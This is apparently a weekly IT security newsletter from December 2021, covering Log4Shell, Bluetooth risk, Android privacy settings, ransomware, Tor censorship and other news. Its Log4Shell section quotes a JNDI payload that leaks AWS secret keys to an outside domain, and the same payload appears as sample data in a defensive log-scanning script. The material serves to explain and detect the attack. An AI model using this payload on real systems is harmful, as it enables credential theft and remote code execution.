Let it Snow with the IT Privacy and Security Weekly Update for December 14th 2021



Daml’ers,

In a year when holiday parties are giving more than anyone bargained for in the form of new covid variants, colds, flu, and a whole range of bacteria that we had deftly sidestepped for the better part of the last 18 months, we have lots of healthy updates for you.

We start them with the V-POTUS and end with 2022 trends.

In between, we touch on Androids, Canadians, and Apaches before discovering Tor blocking and that secret bottle message you threw out to sea.

For the holidays we also have a couple of ideas that might help with stocking stuffers.

So, wrap the gift and tie that bow! To the very best in IT Privacy and Security we go!


US: Kamala Harris Is Right About Bluetooth

Last Monday, Politico led its West Wing Playbook newsletter with a report that Vice President Kamala Harris is “Bluetooth-phobic,” and “insists on using wired headphones,” because of the risks associated with the decades-old wireless standard. It’s presented as a misguided quirk, but … she’s actually right!

Wired headphones are safer. Bluetooth connections can be exploited. A Bluetooth connection can be hacked, allowing cybercriminals to take control of the device.

They can even put malware or spyware on your device to spy on you.
Bluetooth has been used by cybersecurity researchers to exploit security flaws in some phones. They then extracted data, including business credentials, from the system.

According to many academics and other journalists, Harris’ fears about the security hazards posed by Bluetooth technology were well-founded.

Given the political and security risks, Harris is probably wise to turn off her Bluetooth connection. A person’s vulnerability is proportional to the value of their data.

Those who retain their business and personal data on the same device, however, should use caution.

So what’s the upshot for you? You got it from the Veep. If you aren’t using your Bluetooth, turn it off!


Global: New Android 12 Privacy Settings

Android 12 introduced a privacy dashboard to help increase permissions transparency. This shows which apps have accessed the sensors on your phone in the last 24 hours and allows you to deny them further access. It’s a straightforward way to see which apps are doing what on your phone. Go to Settings > Privacy and then open up Privacy Dashboard.

When an Android app is using your phone’s microphone or camera, a small green dot will appear in the top menu bar, similar to a feature Apple added in last year’s iOS 14 release. Swiping down from the top corner of the screen opens the Quick Settings menu, where you can turn the app’s camera and microphone access off instantly. While that block is temporary, you can enter the individual app’s permissions from here and make the change permanent.

Your phone has its own advertising ID that allows apps to link data to your device—building up a profile of you and your interests—so it can then show you personalized ads based on this information. You can now alter your settings to reset the string of numbers identifying you to a series of zeros and stop third parties from linking any information to your device in this way.

So what’s the upshot for you? Perhaps the two biggest things you can do to protect your device, data, and accounts—regardless of what operating system you’re on—are ensuring you’re using a password manager to create and store unique logins for every account you use and making sure multifactor authentication is turned on wherever you can.


CA: Canadian cyber attacks have hit infrastructure the hardest

Small- and medium-sized businesses accounted for two-thirds of Canadian organizations victimized by cyber hijackers leaking their sensitive data publicly as blackmail to force ransom payments during the period January 1, 2020 to June 30, 2020.

Since March 2020, nearly 25 percent of Canadian small businesses have experienced some type of malware attack. That figure is likely higher than reported, officials said.

In Canada, the estimated average cost of a data breach, a compromise that includes but is not limited to ransomware, is C$6.35M.

By the Centre’s figures, the global average total cost of recovery from a ransomware incident (the cost of paying the ransom and/or remediating the compromised network) more than doubled to C$2.3 million in 2021 from C$970,722 in 2020. Worldwide, while known ransom payments increased from 2019 to 2020, the demand amounts appear to have stabilized at roughly $200,000 in 2021.

So what’s the upshot for you? It’s not just us, the Royal Canadian Mounted Police are dealing with this too!


Global: The log4j (Log4Shell) Update

The log4j (Log4Shell) Situation

“What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs.

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.
This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input ${env:PWD}, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.
Example: Here’s an example of extracting AWS Keys and listening for incoming requests. ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.SomeOrAnotherDomain.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them. (Good luck)

Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.

Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
The project is maintained by very few people in their spare time for no money, and if the project had a major issue it would disrupt the entire Internet. We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint. This is not their fault. They’re heroes for keeping the lights on…”

Here is why this risk is so unique:

  • It is a remotely exploitable vulnerability, which gives an attacker privileged access to and possibly even full control of the compromised system. As the sample exploit code highlights, it’s extremely easy to exploit and can happen over a ton of different attack vectors. Unlike most vulnerabilities, which require very specific conditions to be met, Log4Shell is as broad as they get.
  • Log4j is pervasive. It’s all over our infrastructure and ubiquitously used in all manner of applications. In infrastructure, you can find it and fix it if you are diligent. If you’re using applications that are developed using Log4j, you have to wait for updates from those vendors before you can fix your systems and use them safely. Simply put, we will be living with this problem for a long time.
  • Log4j exploits run in Java. Let that sink in for a moment. What it means is that it’s the perfect payload, portable across industrial heavy equipment, network servers, down to printers, and even your kid’s Raspberry Pi.
  • Systems don’t have to be Internet-facing or accessible to be compromised. Consider web or email systems, which might log activity and then periodically ship those logs internally for processing and analysis on an internal logging server. Boom, your internal systems are compromised.
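The quoted “How it Works” section and the last bullet above are the part a defender can act on while patching is under way: the log lines that reach a Log4j-backed logger, wherever they were collected, can be checked for lookup syntax before they are processed. The following is an added example written for this newsletter, not code from the Apache project or from the quoted author. It is a small stack-based parser that pulls out every brace-balanced `${...}` expression in a line, reports nested lookups separately (the quoted `${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}...}` payload is one lookup embedded in another), grades them, and for a `jndi` lookup shows which host the logging machine would have been made to connect to. The four sample access-log lines, the `Finding` record and the severity labels are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry the two
# lookup shapes quoted in the newsletter; lines 1 and 4 are benign.
SAMPLE_LINES = [
    'GET /index.html 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    'GET /login 200 "${env:PWD}"',
    'GET / 404 "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.SomeOrAnotherDomain.com}"',
    'GET /shop 200 "price=$5 {ok}"',
]


@dataclass
class Finding:
    line_no: int
    expression: str   # the ${...} text exactly as logged
    prefix: str       # lookup type: jndi, env, sys, ...
    depth: int        # 0 = top level, 1 = nested inside another lookup
    severity: str
    target: Optional[str] = None  # for jndi: the host the victim would connect to


def extract_lookups(text: str):
    """Return every brace-balanced ${...} expression in text with its nesting depth.

    A small stack parser is used instead of a regex so that a nested payload such as
    ${jndi:ldap://${env:X}.example} yields two findings: the outer jndi lookup and the
    env lookup embedded in its host name.
    """
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
        elif text[i] == "}" and stack:
            start = stack.pop()
            found.append((start, text[start:i + 1], len(stack)))
            i += 1
        else:
            i += 1
    found.sort()  # outermost expression first, ordered by position in the line
    return [(expr, depth) for _, expr, depth in found]


def lookup_prefix(expr: str) -> str:
    """The lookup type is the token between '${' and the first ':' (or '}' if none)."""
    return re.split(r"[:}]", expr[2:], maxsplit=1)[0].lower()


def jndi_target(expr: str) -> str:
    """Host a jndi lookup would make the logging host connect to, inner lookups collapsed."""
    body = expr[len("${jndi:"):-1]
    if "://" not in body:
        return body
    host = body.split("://", 1)[1].split("/", 1)[0]
    while True:  # replace inner ${...} with a placeholder until none can be matched
        collapsed = re.sub(r"\$\{[^{}]*\}", "<lookup>", host)
        if collapsed == host:
            return collapsed
        host = collapsed


def classify(expr: str, depth: int):
    prefix = lookup_prefix(expr)
    if prefix == "jndi":
        return prefix, "critical", jndi_target(expr)  # remote class loading: Log4Shell RCE
    if depth > 0:
        return prefix, "high", None   # value is spliced into an outer lookup and leaves the host
    return prefix, "medium", None     # environment or system data written into the log


def scan_lines(lines) -> List[Finding]:
    """Flag every lookup expression in untrusted input headed for a Log4j-backed logger."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for expr, depth in extract_lookups(line):
            prefix, severity, target = classify(expr, depth)
            findings.append(Finding(line_no, expr, prefix, depth, severity, target))
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        extra = f"  -> connects to {f.target}" if f.target else ""
        print(f"line {f.line_no}: {f.severity:8} {f.prefix:5} depth={f.depth} {f.expression}{extra}")
```

Run it on the constructed lines and line 2 is reported as a medium-severity `env` lookup, line 3 as a critical `jndi` lookup whose destination reads `<lookup>.SomeOrAnotherDomain.com` plus a high-severity nested `env` lookup, and lines 1 and 4 produce nothing. Two design points follow from the newsletter’s own text: because logs get shipped to internal analysis servers, a check like this belongs in the log pipeline at ingestion, not only at an edge WAF; and because a string match on lookup syntax is only a heuristic, it is a way to find exposure and triage, while the fix remains finding and patching every instance of log4j.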

So what’s the upshot for you? Forbes’ Amit Yoran sums it up like this: “Now, as frequently happens, just about every security vendor will sweep in with their aggressively worded marketing spin, ‘If you buy our product and deploy it, you would have been/will be safe.’ Let me be clear. No single product that I’ve come across in the entirety of my career will, in fact, keep you fully safe from this issue. No next-gen firewall, no web application firewall, no endpoint detection and response, no identity management solution, no operational technology product, or anything else will stop Log4Shell.”


Global: Inside Web3: Why crypto fans are going wild over a blockchain-based internet idea

There are a few fundamental differences between web2 and web3, but decentralization is at its core. Web3 enhances the internet as we know it today with a few other added characteristics. web3 is:

  • Verifiable
  • Trustless
  • Self-governing
  • Permissionless
  • Distributed and robust
  • Stateful
  • Native built-in payments

In web3, developers don’t usually build and deploy applications that run on a single server or that store their data in a single database (usually hosted on and managed by a single cloud provider).

Instead, web3 applications either run on blockchains, decentralized networks of many peer-to-peer nodes (servers), or a combination of the two that forms a crypto-economic protocol. These apps are often referred to as dapps (decentralized apps), and you will see that term used often in the web3 space.

To achieve a stable and secure decentralized network, network participants (developers) are incentivized and compete to provide the highest quality services to anyone using the service.

When you hear about web3, you’ll notice that cryptocurrency is often part of the conversation. This is because cryptocurrency plays a big role in many of these protocols. It provides a financial incentive (tokens) for anyone who wants to participate in creating, governing, contributing to, or improving one of the projects themselves.

So what’s the upshot for you? Twitter is already exploring ways to add Web3 features to its app. Yet scaling the infrastructure needed for the fully-fledged version could take decades. Even the largest blockchains are currently too small to handle all transactions that happen on Web2. Web3’s best-case scenario could be existing alongside Big Tech platforms — not replacing them.


US/CN: Inside Tim Cook’s Secret $275 Billion Deal with Chinese Authorities

Apple’s iPhone recently became the top-selling smartphone in China, its second-biggest market after the U.S., for the first time in six years. But the company owes much of that success to CEO Tim Cook, who laid the foundation years ago by secretly signing an agreement, estimated to be worth more than $275 billion, with Chinese officials promising Apple would do its part to develop China’s economy and technological prowess through investments, business deals, and worker training.

Cook forged the five-year agreement, which hasn’t been previously reported, during the first of a series of in-person visits he made to the country in 2016 to quash a sudden burst of regulatory actions against Apple’s business, according to internal Apple documents viewed by The Information.

Before the meetings, Apple executives were scrambling to salvage the company’s relationship with Chinese officials, who believed the company wasn’t contributing enough to the local economy, the documents show. Amid the government crackdown and the bad publicity that accompanied it, iPhone sales plummeted.

So what’s the upshot for you? The 1,250-word Memorandum of Understanding (MOU) between Apple and China’s National Development and Reform Commission reportedly runs for 5 years and accounts for $275 Billion in spending. The agreement also includes a request Apple reportedly received in 2014 or 2015 concerning a small group of uninhabited islands whose ownership China and Japan apparently dispute.

Going by either the Senkaku Islands or the Diaoyu Islands, depending on which side of the argument you’re taking, they inspired a request from China to members of the Maps team to make them appear larger, even when viewers are zoomed out on the map.

According to The Information, not only did Apple eventually make the change, but even today, for viewers using its map from within China, the islands are still shown at a larger scale than the territories around them.


Global: 90% of all bitcoins have now been mined - but the remaining 10% will take over 100 years to reach open market

As of Monday, 90% of all bitcoins have been mined, according to data from Blockchain.com, 12 years after miners acquired the first-ever bitcoins.

That means about 18.9 million coins out of the maximum supply of 21 million are now on the open market. But mining the final 10% isn’t expected to happen until February 2140, based on network estimates and bitcoin halving schedules, CoinDesk reported.
Bitcoin halving - which happens approximately every four years - is when the number of new bitcoins entering circulation shrinks.
The halving process will continue to make mining more challenging. Right now, miners receive about 6.25 bitcoin for every mined block, but this will drop by half in 2024.
Meanwhile, an estimated 20% of bitcoin has been “lost,” meaning they can’t be retrieved. So it remains unlikely the open market ever sees a full 21 million coins in circulation.
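The figures above all fall out of one schedule: the block subsidy starts at 50 BTC and is halved every 210,000 blocks. As an added worked example (not code from the article, CoinDesk or Blockchain.com), the script below reproduces that schedule with integer satoshi arithmetic in the same form Bitcoin Core uses (a right shift of the 50 BTC subsidy once per halving, zero after 64 halvings), then answers the questions the article raises: at which block height 90% of the 21 million is reached, what the 6.25 BTC reward becomes at the 2024 halving, how much is ever issued, and in which year issuance stops. The calendar conversion assumes exactly 10-minute blocks from the 3 January 2009 genesis block, which is an assumption of the example; real blocks have arrived slightly faster, so actual dates run a little ahead of the model.

```python
from datetime import datetime, timedelta

COIN = 100_000_000              # satoshis in one bitcoin
HALVING_INTERVAL = 210_000      # blocks per reward epoch
MAX_SUPPLY = 21_000_000 * COIN  # the protocol cap quoted in the article
GENESIS = datetime(2009, 1, 3)  # genesis block date; 10-minute spacing assumed below


def block_subsidy(height: int) -> int:
    """Subsidy in satoshis for a block at `height`: 50 BTC shifted right once per
    completed halving interval, and zero once 64 halvings have passed (Bitcoin Core's rule)."""
    halvings = height // HALVING_INTERVAL
    if halvings >= 64:
        return 0
    return (50 * COIN) >> halvings


def cumulative_supply(height: int) -> int:
    """Satoshis issued by all blocks below `height`, summed one epoch at a time.
    This is the schedule, not a ledger audit, so the unspendable genesis coins are included."""
    total, h = 0, 0
    while h < height:
        sub = block_subsidy(h)
        if sub == 0:
            break
        epoch_end = min(height, (h // HALVING_INTERVAL + 1) * HALVING_INTERVAL)
        total += sub * (epoch_end - h)
        h = epoch_end
    return total


def height_reaching(target_sats: int):
    """First height at which cumulative issuance is at least `target_sats`; None if never."""
    total, h = 0, 0
    while True:
        sub = block_subsidy(h)
        if sub == 0:
            return None
        epoch_total = sub * HALVING_INTERVAL
        if total + epoch_total >= target_sats:
            needed = target_sats - total
            return h + (needed + sub - 1) // sub  # ceiling division, in blocks
        total += epoch_total
        h += HALVING_INTERVAL


def final_supply():
    """(total satoshis ever issued, first height whose subsidy is zero)."""
    total, h = 0, 0
    while block_subsidy(h) > 0:
        total += block_subsidy(h) * HALVING_INTERVAL
        h += HALVING_INTERVAL
    return total, h


def approx_year(height: int) -> int:
    """Calendar year of `height` under the 10-minute block target (an assumption)."""
    return (GENESIS + timedelta(minutes=10 * height)).year


if __name__ == "__main__":
    ninety = height_reaching(18_900_000 * COIN)
    print(f"90% of supply (18.9M BTC) reached at block {ninety}")
    print(f"reward now: {block_subsidy(ninety) / COIN} BTC; "
          f"after the 2024 halving at block 840000: {block_subsidy(840_000) / COIN} BTC "
          f"(model year {approx_year(840_000)})")
    total, last = final_supply()
    print(f"issuance ends at block {last} (model year {approx_year(last)}); "
          f"total ever issued: {total / COIN:.4f} BTC, short of 21M by {(MAX_SUPPLY - total)} sat")
```

The example shows the 90% mark landing at block 714,000 with 6.25 BTC per block, the 2024 halving dropping the reward to 3.125 BTC, and issuance ending at block 6,930,000 in 2140, in line with the article’s figures. It also shows why the last coins never arrive: because each halving truncates to whole satoshis, the final reward before zero is a single satoshi and the total ever issued is 20,999,999.9769 BTC, a few satoshis short of the cap even before the article’s estimated 20% of lost coins is considered.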

So what’s the upshot for you? Some might consider this BTC dip as the perfect opportunity for a few more stocking stuffers…


US: Aging medical devices open up healthcare to cyberattacks

Age can be a major vulnerability in medical devices. Some can have lifespans of decades, during which time software can go out of date and the companies may stop releasing patches to strengthen their security.

“If Microsoft has terminated patches and updates for Windows after 10 years in existence, who is going to patch or how are we going to manage that device, which has got another 10 to 15 years of life?” Veetil said. “The hospitals find it unjustifiable to change the device, it is a major capital investment.”

One of the most effective weapons in a healthcare system’s cyber defense strategy is asset management — the process of keeping track of every IT-related device across an organization and assessing potential gaps in security such as outdated software.

Different pieces of a healthcare organization’s IT landscape may have been added or removed over decades, meaning it can be difficult for a new IT manager to get to grips with the vast system.

It is unlikely a cyber adversary will hack a device in order to intentionally interfere with a patient’s insulin dose or pacemaker, said Mac McMillan, CEO and co-founder of cybersecurity consulting firm CynergisTek Inc. Injuring or killing somebody by hacking their medical device will attract far more attention from law enforcement, for minimal gain.

Hackers are more likely to see greater benefit in disruptive attacks such as using a medical device as a jumping-off point to breach the company’s network, McMillan said. Through this method of attack, criminals are able to extort more money from a health system by holding onto patient data or disrupting internet systems than they would by intentionally hurting people.

So what’s the upshot for you? This is an all too evident malaise as healthcare providers become easy targets for miscreants. Your local hospital isn’t running Windows 7 because it wants to, it’s because budgeting has put saving lives over tech refreshes. Now, it seems that tech refreshes could be saving lives.


US: Russia’s Internet Censorship Machine Is Going After Tor

At the start of December, the Tor Project’s support email inbox began receiving an unusual number of messages from users saying they were encountering problems accessing the digital anonymity service. “It was not just one or two, but like 10 people asking,” says Gustavo Gus, community team lead of the Tor Project. At the same time, staff at the Open Observatory of Network Interference, which measures and tracks internet censorship, saw indications that suggested Russian internet service providers (ISPs) were blocking the Tor network.

What happened at the start of December, though those in the Tor Project didn’t know it yet, was significant. Roskomnadzor, the Russian media and telecommunications regulator, had issued a demand to ISPs around Russia to block users’ access to Tor’s website. In Russia’s world of decentralized internet infrastructure, ISPs began taking action speedily. And access to parts of the Tor network itself was limited.

The situation was messy, but it all added up to one conclusion: Something was up. “We realized on December 2 or 3 that Tor was being blocked,” says Gus. The Tor Project began contacting reliable contacts in Russia and those outside the country to understand more. Slowly, the project began putting together the pieces of the puzzle, identifying what was going on. The final piece slotted into place on December 6, when the project received an email purporting to be from Roskomnadzor, saying that the Tor Project domain would be blocked. “At first, some of us thought it was a spam email,” admits Gus. “We didn’t think it was a real communication from the government.”

But it was. Torproject.org had been added to Roskomnadzor’s blocked list.

So what’s the upshot for you? Perhaps this goes some way in helping us understand last week’s article on the large numbers of mysterious unidentified Tor nodes that surface and disappear after handling large percentages of Tor traffic.


Global: Chinese cyberattack almost shut off power for 3M Australians

Chinese hackers came within minutes of shutting off power to three million Australian homes but were thwarted at the final hurdle.

A successful attack would knock out power to between 1.4 and 3 million homes with no way of knowing how long it might take to regain control of the generators.

CS Energy quickly realized the cyber attackers were trying to bypass their internal corporate systems to access the generators that circulate 3,500MW of electricity into the grid.

IT specialists came up with a brilliant last-minute move to stop Beijing from gaining access, by separating the company’s corporate and operational computer systems.

Once the network was essentially cut in half, hackers had no way of seizing control of the generators.

Sources with knowledge of the hack attempt said the cyber-attackers were less than 30 minutes away from shutting down power.

So what’s the upshot for you? Recently Microsoft announced it ‘disrupted the activities of a China-based hacking group that we call Nickel’ which carried out attacks in the US and 28 other countries.

‘We believe these attacks were largely being used for intelligence gathering from government agencies, think tanks, and human rights organizations,’ the software giant said.

Last month China targeted Indian utilities and infrastructure sites with cyber-attacks also trying to shut down a coal-fired power plant.

Taiwanese officials said their small democratic nation just 180km off the coast of China receives up to ‘five million attacks a day’ with the vast majority likely to be directed by Beijing.

We see a pattern here.


BR: Brazil health ministry website hit by hackers, vaccination data targeted

Brazil’s government delayed new pandemic-related requirements for travelers entering the country after a hack of its health ministry early Friday morning.

The agency said on its website that several of its systems had been knocked offline by the attack including those that issue digital vaccine cards and track the country’s national immunization program.

The statement said that the attack had “temporarily compromised some of its systems” and that they were unavailable.

A ransomware gang known as Lapsus$ Group took credit for the attack on Friday, boasting that it stole and deleted about 50 terabytes of data from the ministry of health’s systems.

“Contact us if you want the data back,” the group said in its ransom note, with email and Telegram details.

The agency told reporters on Friday that it has backups of all the data that was deleted by the hackers.

So what’s the upshot for you? If you are traveling and unvaccinated, travel quickly. The 5-day quarantine for unvaccinated visitors is to be postponed for a week while the vaccine data is restored.


Global: Google is building a new augmented reality device and operating system

Google was one of the early leaders in the first wave of modern augmented reality (AR) research and devices, but the company has appeared to cool to AR in recent years even as Apple and Facebook have invested heavily in it. But it looks like that trend will soon be reversed.

On LinkedIn, operating system engineering director Mark Lucovsky announced that he has joined Google. He previously headed up mixed reality operating system work for Meta, and before that he was one of the key architects of Windows NT at Microsoft. “My role is to lead the Operating System team for Augmented Reality at Google,” he wrote.

He also posted a link to some job listings at Google that give the impression Google is getting just as serious about AR as Apple or Meta.

So what’s the upshot for you? Advertised job roles are largely in the United States, but some are located in Waterloo, Ontario—the HQ of Canadian smart glasses maker North, which Google acquired in 2020.
Our question is, “Will anyone find any privacy in the meta with Facebook, Google, and others piling in?”


US: Woman lost @metaverse Instagram handle days after Facebook name change

Thea-Mai Baumann had posted to Instagram using the @metaverse handle for nearly a decade when her account was disabled on November 2.

“Your account has been blocked for pretending to be someone else,” the app told her.

Baumann wasn’t exactly sure what had happened, but the timing was curious. The account block came just days after Facebook had announced its new name, Meta. CEO Mark Zuckerberg said the name reflected the company’s new focus on its vision of the metaverse, a virtual world meant to facilitate commerce, communication, and more. Baumann’s @metaverse handle was suddenly a hot commodity.

“This account is a decade of my life and work. I didn’t want my contribution to the metaverse to be wiped from the internet,” Baumann told The New York Times. “That happens to women in tech, to women of color in tech, all the time.” The Australian had created an app that would display virtual holograms over her company’s fingernail designs. She envisioned making an entire line of clothing and accessories that would be virtually augmented. After five years, funding ran dry and she began to use her Instagram account to promote her other work.

Baumann’s @metaverse account went relatively unnoticed over the years, attracting fewer than 1,000 followers. Then Facebook changed its name. …

So what’s the upshot for you? It’s unclear whether Meta/Facebook had anything to do with Baumann losing access to her account. Baumann attempted to verify her identity with Instagram, but she didn’t receive a reply for weeks. She tried working with an intellectual property attorney to see what rights she had to get her account back, but she couldn’t afford their services.

Once a journalist got wind of the story, though, things changed. On December 4, two days after a New York Times reporter contacted Meta about the account, Baumann suddenly regained access to @metaverse.


UK: All is not right in the house of the high IQ

Mensa - the society for people with high IQs - has paid damages to a former director it accused of being responsible for an embarrassing data leak.

The Mensa website was hacked in January this year, resulting in the theft of personal information from the society’s 18,000 members.

Eugene Hopkinson, a former director and technology officer at British Mensa, stood down from the society in the wake of the attack, claiming it had failed to properly secure members’ passwords. Lots of members’ personal information was reported to have been published online, including transcripts of online chats and the IQ scores of current and failed applicants.

In the immediate aftermath of the attack, Mensa tried to claim that no personal information had been accessed before acknowledging a breach and then suggesting that “some personal data of our members was deliberately put into the public domain”.

In subsequent communications to its members, Mensa then tried to pin the blame for the breach on Hopkinson, suggesting he was personally involved in the attacks. Hopkinson subsequently sued Mensa for libel.

So what’s the upshot for you? “On the basis of the evidence currently available to us, British Mensa accepts that there is insufficient evidence to reach the criminal standard of proof that Mr. Hopkinson was responsible for either the cyberattack or the subsequent data disclosure.

“Legal action between Mr. Hopkinson and British Mensa Ltd has now been resolved and we will be making no further comment. For commercial reasons, British Mensa’s insurers recommended that the claim was settled out of court.”


Global: It’s not private, I wrote it on a plastic bottle.

You have probably heard about all the plastic garbage that washes out of rivers and into the oceans. You have probably also heard that a plastic island the size of Texas is floating somewhere out in the middle of the Pacific (not actually true, as if it were, you would probably already have real estate developers putting hotels on it or Kevin Costner filming a Waterworld sequel there).

You probably have heard that microplastics are turning up in our water, our air, and even in the virgin snows of the Arctic and Antarctic.

Right now we have no idea what the long-term effect will be on plants, animals, and us, so you may be interested to learn that microbes in oceans and soils across the globe are evolving to eat plastic. The research scanned more than 200m genes found in DNA samples taken from the environment and found 30,000 different enzymes that could degrade 10 different types of plastic.

The study is the first large-scale global assessment of the plastic-degrading potential of bacteria and found that one in four of the organisms analyzed carried a suitable enzyme. The researchers found that the number and type of enzymes they discovered matched the amount and type of plastic pollution in different locations.

The results “provide evidence of a measurable effect of plastic pollution on the global microbial ecology”, the scientists said.

Millions of tonnes of plastic are dumped in the environment every year, and the pollution now pervades the planet, from the summit of Mount Everest to the deepest oceans. Reducing the amount of plastic used is vital, as is the proper collection and treatment of waste.

So what’s the upshot for you? Utilization of synthetic biology approaches to enhance current plastic degradation processes is of crucial importance, as natural plastic degradation processes are very slow. A plastic soda bottle can take almost 50 years to biodegrade, releasing methane into the atmosphere as it degrades.

So yes, message in the bottle or on the bottle, no, no privacy there, it’s going to be around for a long time…


Global: Pinterest Predicts 2022

Thanks to its massive trove of data, Pinterest knows that “tooth gem” searches were up 85% over the past year, and “crystal eye makeup” searches doubled.

The anonymized data is still not being used (at least by Pinterest) for revenue generation, but that could change soon enough.

Pinterest’s trend predictions for next year include pearlcore, dopamine dressing, barkitecture, and lounge-erie (but we didn’t see predictions about next year’s cyber-attacks).

Pinterest said that 80% of its predictions last year ended up #trending this year.
Need gift-giving ideas for the holidays? This might be a good place to look for inspiration.

So what’s the upshot for you? What’s an “interest” now could be a “trend” in a year.



That’s it for this week Damlers! Throw one more log on the fire, well unless you, like us, are getting hit with another highly unseasonable heatwave.


Be kind, stay safe, stay secure, let it snow and see you in se7en!


